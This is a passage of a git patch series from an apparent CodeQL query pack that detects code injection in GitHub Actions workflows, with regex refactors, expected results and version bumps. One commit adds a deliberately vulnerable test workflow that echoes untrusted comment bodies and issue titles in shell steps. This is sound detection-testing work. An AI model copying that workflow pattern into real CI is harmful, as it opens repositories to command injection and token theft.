.github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref new file mode 100644 index 000000000000..fbd758b6bd62 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/PrivilegedCodeInjection.ql From 5908d6c567601c74b9fc2f684a0c8c811ca4170a Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 11:23:37 +0100 Subject: [PATCH 124/707] Fix tokens --- action.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index f88e3b078509..e8f13962e819 100644 --- a/action.yml +++ b/action.yml @@ -24,7 +24,7 @@ runs: - name: Do something with context shell: bash env: - GITHUB_TOKEN: ${{ github.token }} - GH_TOKEN: ${{ github.token }} + GITHUB_TOKEN: ${{ inputs.token }} + GH_TOKEN: ${{ inputs.token }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 01d8d79e6d36b294d6638bee30ec6809cf96cf6b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:34:12 +0100 Subject: [PATCH 125/707] Bump versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d211b8fc2baf..4dd2ab2866e6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.2 +version: 0.0.3 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 61ef9d40ab5f..90647d422407 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.2 +version: 0.0.3 groups: - actions - queries From 6cb15f06bceaa9c6304743f5e4c6a49015f82c00 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:54:21 +0100 Subject: [PATCH 126/707] fix(fn): Apply json wrappers to source regexps --- ql/lib/codeql/actions/Ast.qll | 5 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 18 +++--- .../codeql/actions/dataflow/FlowSources.qll | 18 +++--- .../CWE-094/.github/workflows/json_wrap.yml | 59 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 4 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++ 6 files changed, 89 insertions(+), 19 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 4a7ff12b4f96..91612c5836b1 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -9,6 +9,11 @@ module Utils { .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") } + + bindingset[regex] + string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index f45565caed77..3fa1769e762d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -813,28 +813,24 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { } private string stepsCtxRegex() { - result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } +private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } +private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } private string inputsCtxRegex() { - result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) -} - -bindingset[regex] -private string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + result = + Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a586cab4a322..ca1d21637867 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -28,7 +28,7 @@ private predicate isExternalUserControlledIssue(string context) { exists(string reg | reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -45,18 +45,20 @@ private predicate isExternalUserControlledPullRequest(string context) { "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.review\\.body\\b") + Utils::normalizeExpr(context) + .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.review\\.body\\b")) } bindingset[context] private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.comment\\.body\\b") + Utils::normalizeExpr(context) + .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.comment\\.body\\b")) } bindingset[context] @@ -68,7 +70,7 @@ private predicate isExternalUserControlledGollum(string context) { "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -89,7 +91,7 @@ private predicate isExternalUserControlledCommit(string context) { "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -98,7 +100,7 @@ private predicate isExternalUserControlledDiscussion(string context) { exists(string reg | reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -118,7 +120,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml new file mode 100644 index 000000000000..b17a1fecbeb4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml @@ -0,0 +1,59 @@ +name: Issue Comment Created + +on: + issue_comment: + types: + - created + +jobs: + jira: + runs-on: ubuntu-latest + if: ${{ github.event.comment.body == '/jira ticket' }} + steps: + - run: echo ${{ github.event.comment.body }} + + - name: Login + uses: atlassian/gajira-login@v3 + env: + JIRA_BASE_URL: ${{ secrets.JIRA_BASE_URL }} + JIRA_USER_EMAIL: ${{ secrets.JIRA_USER_EMAIL }} + JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} + + - name: SearchParam + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Search + id: search + uses: tomhjp/gh-action-jira-search@v0.2.1 + with: + jql: 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Log + run: echo "Found issue ${{ steps.search.outputs.issue }}" + + - name: Create + id: create + if: steps.search.outputs.issue == '' + uses: atlassian/gajira-create@v3 + with: + project: ${{ secrets.JIRA_PROJECT }} + issuetype: Task + summary: '${{ github.event.repository.name }}: ${{ github.event.issue.title }}' + description: | + *Issue Link:* ${{ github.event.issue.html_url }} + + ${{ github.event.issue.body }} + fields: '{"customfield_10006": ${{ toJSON(secrets.JIRA_EPIC_TICKET) }}, "customfield_17401":{"value":${{ toJSON( secrets.JIRA_LAYER_CAKE )}}}}' + + - name: Add Comment + if: steps.search.outputs.issue == '' && steps.create.outputs.issue != '' + uses: actions/github-script@v6 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: '👋 Thanks, Jira [${{steps.create.outputs.issue}}] ticket created.' + }) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 23e502567561..14b0c535ac62 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -131,6 +131,8 @@ nodes | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -234,6 +236,8 @@ subpaths | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 9101c80a5955..bdb5ae3ea556 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -131,6 +131,8 @@ nodes | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -229,6 +231,8 @@ subpaths | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | From d9e589c6e7d913c2e3a987c0f2a30676a47df15b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:58:46 +0100 Subject: [PATCH 127/707] Remove unnecessary boundary anchors --- ql/lib/codeql/actions/Ast.qll | 6 +- .../codeql/actions/dataflow/FlowSources.qll | 64 +++++++++---------- 2 files changed, 34 insertions(+), 36 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 91612c5836b1..ecc0ad16f5f4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -12,7 +12,11 @@ module Utils { bindingset[regex] string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + result = + [ + "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", + "toJSON\\(\\s*" + regex + "\\s*\\)" + ] } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ca1d21637867..007ace43bd0c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -25,9 +25,7 @@ abstract class RemoteFlowSource extends SourceNode { bindingset[context] private predicate isExternalUserControlledIssue(string context) { - exists(string reg | - reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] - | + exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -37,12 +35,12 @@ private predicate isExternalUserControlledPullRequest(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.pull_request\\.title\\b", "\\bgithub\\.event\\.pull_request\\.body\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.label\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.default_branch\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.description\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.homepage\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" + "github\\.event\\.pull_request\\.title", "github\\.event\\.pull_request\\.body", + "github\\.event\\.pull_request\\.head\\.label", + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.repo\\.description", + "github\\.event\\.pull_request\\.head\\.repo\\.homepage", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref" ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -51,14 +49,12 @@ private predicate isExternalUserControlledPullRequest(string context) { bindingset[context] private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context) - .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.review\\.body\\b")) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.review\\.body")) } bindingset[context] private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context) - .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.comment\\.body\\b")) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.comment\\.body")) } bindingset[context] @@ -66,8 +62,8 @@ private predicate isExternalUserControlledGollum(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.page_name\\b", - "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title" ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -79,16 +75,15 @@ private predicate isExternalUserControlledCommit(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.message\\b", - "\\bgithub\\.event\\.head_commit\\.message\\b", - "\\bgithub\\.event\\.head_commit\\.author\\.email\\b", - "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.head_commit\\.committer\\.email\\b", - "\\bgithub\\.event\\.head_commit\\.committer\\.name\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.email\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.name\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", + "github\\.event\\.commits\\[[0-9]+\\]\\.message", "github\\.event\\.head_commit\\.message", + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -98,7 +93,7 @@ private predicate isExternalUserControlledCommit(string context) { bindingset[context] private predicate isExternalUserControlledDiscussion(string context) { exists(string reg | - reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] + reg = ["github\\.event\\.discussion\\.title", "github\\.event\\.discussion\\.body"] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) @@ -109,15 +104,14 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.workflow\\.path\\b", - "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", - "\\bgithub\\.event\\.workflow_run\\.display_title\\b", - "\\bgithub\\.event\\.workflow_run\\.head_repository\\.description\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.message\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.email\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.email\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.display_title", + "github\\.event\\.workflow_run\\.head_repository\\.description", + "github\\.event\\.workflow_run\\.head_commit\\.message", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) From e0bbb66be47b1076532dcf1a179f1220fdf55e73 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 15:11:21 +0100 Subject: [PATCH 128/707] Try to fix `actions-all` suite --- ql/src/codeql-suites/actions-all.qls | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 2439b95a8e55..8c0f580a7ade 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -1,2 +1,5 @@ - description: Standard Code Scanning queries for Actions -- queries: . \ No newline at end of file +- queries: . +- include: + kind: + - path-problem From 09c2ba4280c91840c176bab80b056b5aca9e5246 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 16:39:18 +0100 Subject: [PATCH 129/707] Make action download `actions-all` --- .github/action/src/codeql.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 56615fa80cee..0fcdd81ee3fd 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "githubsecuritylab/actions-all", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), From e60c0b875fd69025fc695601e8981bbf4dae1b6f Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 22:01:06 